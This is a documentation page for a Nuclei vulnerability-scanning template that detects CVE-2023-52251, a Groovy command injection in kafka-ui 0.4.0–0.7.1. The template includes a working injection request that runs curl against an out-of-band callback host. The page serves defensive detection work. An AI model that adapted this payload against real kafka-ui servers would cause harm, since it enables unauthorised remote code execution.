Skip to content
Nuclei Templates

Kafka UI 0.7.1 Command Injection

ID: CVE-2023-52251

Severity: high

Author: yhy0,iamnoooob

Tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm

Description

Section titled “Description”

An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.

YAML Source

Section titled “YAML Source”
id: CVE-2023-52251


info:
  name: Kafka UI 0.7.1 Command Injection
  author: yhy0,iamnoooob
  severity: high
  description: |
    An issue discovered in provectus kafka-ui 0.4.0 through 0.7.1 allows remote attackers to execute arbitrary code via the q parameter of /api/clusters/local/topics/{topic}/messages.
  reference:
    - http://packetstormsecurity.com/files/177214/Kafka-UI-0.7.1-Command-Injection.html
    - https://github.com/BobTheShoplifter/CVE-2023-52251-POC
    - https://github.com/nomi-sec/PoC-in-GitHub
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-52251
    cwe-id: CWE-94
    epss-score: 0.03218
    epss-percentile: 0.91206
    cpe: cpe:2.3:a:provectus:ui:*:*:*:*:*:kafka:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: provectus
    product: ui
    framework: kafka
    fofa-query: icon_hash="-1477045616"
  tags: cve,cve2023,rce,kafka,kafka-ui,packetstorm


http:
  - raw:
      - |
        GET /api/clusters HTTP/1.1
        Host: {{Hostname}}


    extractors:
      - type: json
        name: cluster-name
        internal: true
        json:
          - '.[0].name'


  - raw:
      - |
        GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1
        Host: {{Hostname}}


    extractors:
      - type: json
        name: topic-name
        internal: true
        json:
          - '.topics[].name'


  - raw:
      - |
        @timeout 20s
        GET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1
        Host: {{Hostname}}


    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"


      - type: word
        part: body
        words:
          - 'Assigning partitions'
# digest: 4a0a00473045022100a85e8d047d39594cc241ab93b56f92cc2de792b9eb3818d11ff7bfe95a586c4c0220678d97ef16232aa0decdd70cc0fada72e42b5dc4a3feaffde1651aeadd37bf9b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-52251.yaml"

View on Github